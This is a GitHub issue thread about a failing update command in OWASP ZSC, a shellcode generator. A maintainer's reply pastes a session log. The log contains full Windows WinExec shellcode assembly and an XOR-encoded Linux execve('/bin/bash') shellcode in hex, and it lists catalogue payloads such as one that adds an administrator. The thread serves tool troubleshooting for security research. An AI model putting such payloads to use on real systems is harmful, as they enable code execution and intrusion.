Comments (5)
iNoSec
commented on June 24, 2024
My bad thats simple the copy/paste thas make bug, if type the command not like a big fat ass thats work, can close this issue
from zsc.
iNoSec
commented on June 24, 2024
just update dont work
from zsc.
Ali-Razmjoo
commented on June 24, 2024
works fine for me!
______ __ _____ _____ ______ _____ _____
/ __ \ \ / /\ / ____| __ \ |___ // ____|/ ____|
| | | \ \ /\ / / \ | (___ | |__) | / /| (___ | |
| | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| |
| |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____
\____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____|
OWASP ZeroDay Cyber Research Shellcoder
zsc> shellcode
zsc/shellcode>
download generate search shell_storm_list
zsc/shellcode> search
keyword_to_search>
download generate search shell_storm_list
keyword_to_search> winexec
[+] author: DATA_SNIPER shellcode_id: 148 platform: Windows title: telnetbind by winexec - 111 bytes
[+] author: Lord Kelvin shellcode_id: 581 platform: Windows title: XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[+] author: RubberDuck shellcode_id: 766 platform: Windows title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[+] author: RubberDuck shellcode_id: 662 platform: Windows title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[+] author: Weiss shellcode_id: 391 platform: Windows title: WinExec() Command Parameter - 104 bytes
zsc> shellcode
zsc/shellcode> download
shellcode_id> 391
;
; relocateable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386
.model flat,stdcall
ROL_CONSTANT equ 5
mrol macro iNum:req,iBits:req
exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm
mror macro iNum:req,iBits:req
exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm
hashapi macro szApi
local dwApi
dwApi = 0
forc x,szApi
dwApi = dwApi + '&x'
dwApi = mrol(dwApi,ROL_CONSTANT)
endm
dwApi = mrol(dwApi,ROL_CONSTANT)
dw (dwApi and 0ffffh)
endm
.code
assume fs:nothing
code_start:
jmp load_data
setup_parameters:
pop ebp
xor ecx,ecx
push ecx ; ExitThread() exitcode
push ecx ; SW_HIDE
mov cl,(cmd_end-api_hashes) ; limit of 255 bytes per command
inc byte ptr[ebp+ecx]
lea eax,[ebp+(cmd_string-api_hashes)]
push eax ; WinExec command string
get_k32_base:
mov cl,30h
mov eax,fs:[ecx]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov ebx,[eax+08h]
get_api_loop:
mov eax,[ebx+3ch]
mov eax,[ebx+eax+78h]
lea esi,[ebx+eax+1ch]
mov cl,3
load_rva:
lodsd
add eax,ebx
push eax
loop load_rva
pop ebp
pop edi
load_api:
mov esi,[edi+4*ecx]
add esi,ebx
xor eax,eax
cdq
hash_api:
lodsb
add edx,eax
rol edx,ROL_CONSTANT
dec eax
jns hash_api
inc ecx
mov eax,[esp+4]
cmp dx,word ptr[eax]
jne load_api
pop eax
movzx edx,word ptr[ebp+2*ecx-2]
add ebx,[eax+4*edx]
pop esi
call ebx
lodsw
jmp get_k32_base
load_data:
call setup_parameters
api_hashes:
hashapi <WinExec>
hashapi <ExitThread>
code_end:
cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh
cmd_end equ $-1
end code_start
Shellcode output to a .c file?(y or n)> n
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> linux_x86
zsc/shellcode/generate/linux_x86>
chmod download exec script_executor write
dir_create download_execute file_create system
zsc/shellcode/generate/linux_x86> exec
zsc/shellcode/generate/linux_x86/exec> file_to_execute
file_to_execute> /bin/bash
[+] file_to_execute set to "/bin/bash"
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
[+] enter encode type
zsc/shellcode/generate/linux_x86/exec/encode_type> xo
xor_random xor_yourvalue
zsc/shellcode/generate/linux_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x6a\x4e\x58\x83\xf0\x08\x31\xdb\x31\xc9\xcd\x80\x68\x6a\x45\x48\x62\x5b\x68\xfa\xd5\xd8\x0a\x58\x31\xd8\x50\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x37\x31\x4e\x57\x5b\x68\x18\x53\x2f\x24\x58\x31\xd8\x50\x68\x5a\x38\x65\x4c\x5b\x68\x75\x5a\x0c\x22\x58\x31\xd8\x50\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80
Shellcode output to a .c file?(y or n)> n
zsc> wrong input!
[!] interrupted by user!
Exit
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>python -V
Python 2.7.13
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>
from zsc.
Ali-Razmjoo
commented on June 24, 2024
if you still have errors, please provide your os, os version, python version.
from zsc.
iNoSec
commented on June 24, 2024
Like i said, i copied/paste command but when i write them, all is working just the update command which fail with a connection errror. I can dl shellcode from shellstorm so i have no problem with my connection. Im not on my pc now but i will see the update URL in the code tonight.
Im on ParrotOS and i use python 2.7 for owasp zsc (i confirm tonight)
Thanks
from zsc.
Related Issues (20)
- obfuscate: no validation on file type HOT 1
- --show-payloads turns my terminal green HOT 7
- No tab completion when calling ZSC from different directory HOT 3
- shell-storm download mangles quotes HOT 2
- shell-storm search changes contexts HOT 1
- Confusing addition to `help` command HOT 3
- Implement continuous integration with travis HOT 1
- After one has choosen obfuscate and then the language there is no way to go back to change language HOT 1
- OWASP Code Sprint 2017 HOT 1
- issue in php encoders HOT 1
- Update fails HOT 12
- It is impossible to exit/quit/back in shellcode download menu. HOT 1
- Obfuscate other sources code? HOT 1
- can close
- how to obfuscate with this? HOT 1
- output shellcode file not showing the shellcode after obfuscate method
- compiling HOT 4
- Proof of code obfuscation functionality HOT 8
- Can not update
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from zsc.